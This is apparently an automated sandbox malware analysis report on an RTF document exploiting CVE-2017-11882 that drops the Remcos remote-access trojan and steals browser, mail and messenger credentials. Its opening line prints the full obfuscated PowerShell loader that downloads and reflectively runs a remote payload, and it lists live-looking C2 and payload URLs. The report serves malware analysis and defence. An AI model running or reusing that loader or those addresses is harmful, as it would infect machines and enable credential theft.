                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('{2}'+'ur'+'l'+' = {'+'1}ht'+'tp'+'s://ra'+'w.gi'+'th'+'ubusercontent.com/n'+'odetec'+'t'+'on/nodet'+'ecto'+'n'+'/'+'refs'+'/head'+'s/main/'+'det'+'ahnot'+'h'+'-'+'v.txt{1'+'}; '+'{2}'+'base6'+'4cont'+'ent '+'='+' (n'+'e'+'w-'+'obj'+'ect syst'+'e'+'m.n'+'et.'+'we'+'bcli'+'e'+'nt'+').'+'do'+'wn'+'loa'+'dst'+'r'+'i'+'ng('+'{2}u'+'rl); {2}bina'+'ryconten'+'t '+'= ['+'s'+'ystem'+'.conv'+'ert]::f'+'r'+'o'+'m'+'base64stri'+'ng'+'({2}bas'+'e64'+'conte'+'nt);'+' '+'{2'+'}'+'a'+'ssemb'+'l'+'y'+' ='+' [refl'+'e'+'ct'+'i'+'o'+'n.assem'+'b'+'ly]'+'::loa'+'d({'+'2}b'+'inaryco'+'n'+'tent'+'); [dnli'+'b.'+'io'+'.ho'+'me]'+'::vai({0}txt.e'+'c'+'cnn/04'+'2/741.03'+'1.'+'271.7'+'01//'+':ptth'+'{0}'+', {'+'0}d'+'es'+'ati'+'v'+'ado'+'{0}'+', {'+'0}desati'+'vado{0}, {'+'0}desa'+'ti'+'vad'+'o'+'{0}, {'+'0}r'+'e'+'g'+'a'+'sm{0}, {0}{0},'+'{0}{0})')-f[char]34,[char]39,[char]36) |. ( $pshome[21]+$pshome[30]+'x')"Jump to behavior
                    Source: RegAsm.exe, 00000009.00000002.873637791.00000000004E1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
                    Source: logs.dat.9.drBinary or memory string: [Program Manager]
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00434CB6 cpuid 9_2_00434CB6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,9_2_0045201B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,9_2_004520B6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,9_2_00452143
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,9_2_00452393
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,9_2_00448484
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,9_2_004524BC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,9_2_004525C3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,9_2_00452690
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,9_2_0044896D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoA,9_2_0040F90C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: IsValidCodePage,GetLocaleInfoW,9_2_00451D58
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,9_2_00451FD0
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_004489D7 GetSystemTimeAsFileTime,9_2_004489D7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0041B69E GetComputerNameExW,GetUserNameW,9_2_0041B69E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00449210 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,9_2_00449210
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0041739B GetVersionExW,11_2_0041739B
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.powershell.exe.6b080d8.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.powershell.exe.6b080d8.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000009.00000002.873764967.000000000051C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.874039059.000000000231E000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.873637791.00000000004E1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.873637791.00000000004C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.370382031.0000000003539000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.374107971.00000000066A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3696, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3816, type: MEMORYSTR
                    Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data9_2_0040BA4D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\9_2_0040BB6B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \key3.db9_2_0040BB6B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail <.oeaccountJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULLJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail *Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULLJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup *Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup NULLJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new *Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new NULLJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\places.sqliteJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.dbJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.dbJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.dbJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\PaltalkJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Identities\{56EE7341-F593-4666-B32B-0DA2F15C6755}\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45aJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4addJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: ESMTPPassword12_2_004033F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword12_2_00402DB3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword12_2_00402DB3
                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3956, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-8AXK3LJump to behavior
                    Source: Yara matchFile source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.powershell.exe.6b080d8.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.powershell.exe.6b080d8.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000009.00000002.873764967.000000000051C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.874039059.000000000231E000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.873637791.00000000004E1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.873637791.00000000004C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.370382031.0000000003539000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.374107971.00000000066A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3696, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3816, type: MEMORYSTR
                    Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: cmd.exe9_2_0040569A
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity Information111
                    Scripting
                    Valid Accounts11
                    Native API
                    111
                    Scripting
                    1
                    DLL Side-Loading
                    11
                    Deobfuscate/Decode Files or Information
                    2
                    OS Credential Dumping
                    2
                    System Time Discovery
                    Remote Services11
                    Archive Collected Data
                    13
                    Ingress Tool Transfer
                    Exfiltration Over Other Network Medium1
                    System Shutdown/Reboot
                    CredentialsDomainsDefault Accounts43
                    Exploitation for Client Execution
                    1
                    DLL Side-Loading
                    1
                    Bypass User Account Control
                    2
                    Obfuscated Files or Information
                    211
                    Input Capture
                    1
                    Account Discovery
                    Remote Desktop Protocol1
                    Data from Local System
                    21
                    Encrypted Channel
                    Exfiltration Over Bluetooth1
                    Defacement
                    Email AddressesDNS ServerDomain Accounts122
                    Command and Scripting Interpreter
                    1
                    Windows Service
                    1
                    Access Token Manipulation
                    1
                    Install Root Certificate
                    2
                    Credentials in Registry
                    1
                    System Service Discovery
                    SMB/Windows Admin Shares2
                    Email Collection
                    1
                    Non-Standard Port
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal Accounts2
                    Service Execution
                    Login Hook1
                    Windows Service
                    1
                    DLL Side-Loading
                    3
                    Credentials In Files
                    4
                    File and Directory Discovery
                    Distributed Component Object Model211
                    Input Capture
                    1
                    Remote Access Software
                    Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud Accounts3
                    PowerShell
                    Network Logon Script422
                    Process Injection
                    1
                    Bypass User Account Control
                    LSA Secrets38
                    System Information Discovery
                    SSH3
                    Clipboard Data
                    2
                    Non-Application Layer Protocol
                    Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    Masquerading
                    Cached Domain Credentials3
                    Security Software Discovery
                    VNCGUI Input Capture213
                    Application Layer Protocol
                    Data Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    Modify Registry
                    DCSync21
                    Virtualization/Sandbox Evasion
                    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                    Virtualization/Sandbox Evasion
                    Proc Filesystem4
                    Process Discovery
                    Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                    Access Token Manipulation
                    /etc/passwd and /etc/shadow1
                    Application Window Discovery
                    Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron422
                    Process Injection
                    Network Sniffing1
                    System Owner/User Discovery
                    Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                    Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchdStripped PayloadsInput Capture1
                    Remote System Discovery
                    Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 signatures2 2 Behavior Graph ID: 1526390 Sample: DSpWOKW7zn.rtf Startdate: 05/10/2024 Architecture: WINDOWS Score: 100 66 Suricata IDS alerts for network traffic 2->66 68 Found malware configuration 2->68 70 Malicious sample detected (through community Yara rule) 2->70 72 19 other signatures 2->72 11 WINWORD.EXE 291 13 2->11         started        process3 process4 13 EQNEDT32.EXE 12 11->13         started        18 EQNEDT32.EXE 11->18         started        dnsIp5 48 107.172.130.147, 49161, 49163, 80 AS-COLOCROSSINGUS United States 13->48 42 C:\...\nicepciturewithggreatethingstob.vBS, Unicode 13->42 dropped 102 Office equation editor establishes network connection 13->102 104 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 13->104 20 wscript.exe 1 13->20         started        file6 signatures7 process8 signatures9 82 Suspicious powershell command line found 20->82 84 Wscript starts Powershell (via cmd or directly) 20->84 86 Bypasses PowerShell execution policy 20->86 88 2 other signatures 20->88 23 powershell.exe 4 20->23         started        process10 signatures11 90 Suspicious powershell command line found 23->90 92 Obfuscated command line found 23->92 94 Suspicious execution chain found 23->94 26 powershell.exe 12 5 23->26         started        process12 dnsIp13 46 raw.githubusercontent.com 185.199.109.133, 443, 49162 FASTLYUS Netherlands 26->46 96 Installs new ROOT certificates 26->96 98 Writes to foreign memory regions 26->98 100 Injects a PE file into a foreign processes 26->100 30 RegAsm.exe 3 13 26->30         started        signatures14 process15 dnsIp16 50 dumboi.duckdns.org 30->50 52 dumboi.duckdns.org 185.236.203.101, 49164, 49165, 51525 M247GB Romania 30->52 54 geoplugin.net 178.237.33.50, 49166, 80 ATOM86-ASATOM86NL Netherlands 30->54 44 C:\ProgramData\remcos\logs.dat, data 30->44 dropped 56 Contains functionality to bypass UAC (CMSTPLUA) 30->56 58 Detected Remcos RAT 30->58 60 Tries to steal Mail credentials (via file registry) 30->60 64 8 other signatures 30->64 35 RegAsm.exe 1 30->35         started        38 RegAsm.exe 1 30->38         started        40 RegAsm.exe 11 30->40         started        file17 62 Uses dynamic DNS services 50->62 signatures18 process19 signatures20 74 Tries to steal Instant Messenger accounts or passwords 35->74 76 Tries to steal Mail credentials (via file / registry access) 35->76 78 Searches for Windows Mail specific files 35->78 80 Tries to harvest and steal browser information (history, passwords, etc) 38->80

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    DSpWOKW7zn.rtf58%ReversingLabsDocument-RTF.Exploit.CVE-2017-11882
                    No Antivirus matches
                    No Antivirus matches
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    http://www.imvu.comr0%URL Reputationsafe
                    http://ocsp.entrust.net030%URL Reputationsafe
                    https://contoso.com/License0%URL Reputationsafe
                    http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                    https://deff.nelreports.net/api/report?cat=msn0%URL Reputationsafe
                    http://go.micros0%URL Reputationsafe
                    http://geoplugin.net/json.gp/C0%URL Reputationsafe
                    https://contoso.com/0%URL Reputationsafe
                    https://nuget.org/nuget.exe0%URL Reputationsafe
                    https://login.yahoo.com/config/login0%URL Reputationsafe
                    http://ocsp.entrust.net0D0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                    http://nuget.org/NuGet.exe0%URL Reputationsafe
                    http://crl.entrust.net/server1.crl00%URL Reputationsafe
                    http://www.imvu.com0%URL Reputationsafe
                    https://contoso.com/Icon0%URL Reputationsafe
                    http://geoplugin.net/json.gp0%URL Reputationsafe
                    https://secure.comodo.com/CPS00%URL Reputationsafe
                    http://crl.entrust.net/2048ca.crl00%URL Reputationsafe
                    http://www.ebuddy.com0%URL Reputationsafe
                    NameIPActiveMaliciousAntivirus DetectionReputation
                    raw.githubusercontent.com
                    185.199.109.133
                    truefalse
                      unknown
                      geoplugin.net
                      178.237.33.50
                      truefalse
                        unknown
                        dumboi.duckdns.org
                        185.236.203.101
                        truetrue
                          unknown
                          NameMaliciousAntivirus DetectionReputation
                          dumboi.duckdns.orgtrue
                            unknown
                            https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txtfalse
                              unknown
                              http://107.172.130.147/240/NNCCE.txttrue
                                unknown
                                http://geoplugin.net/json.gpfalse
                                • URL Reputation: safe
                                unknown
                                http://107.172.130.147/240/nicepciturewithggreatethingstobe.tIFtrue
                                  unknown
                                  NameSourceMaliciousAntivirus DetectionReputation
                                  http://b.scorecardresearch.com/beacon.jsbhvB7EA.tmp.11.drfalse
                                    unknown
                                    http://acdn.adnxs.com/ast/ast.jsbhvB7EA.tmp.11.drfalse
                                      unknown
                                      http://www.imvu.com/iKRegAsm.exe, 0000000D.00000002.380797855.000000000037C000.00000004.00000010.00020000.00000000.sdmpfalse
                                        unknown
                                        http://www.imvu.comrRegAsm.exe, 0000000D.00000002.380858282.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
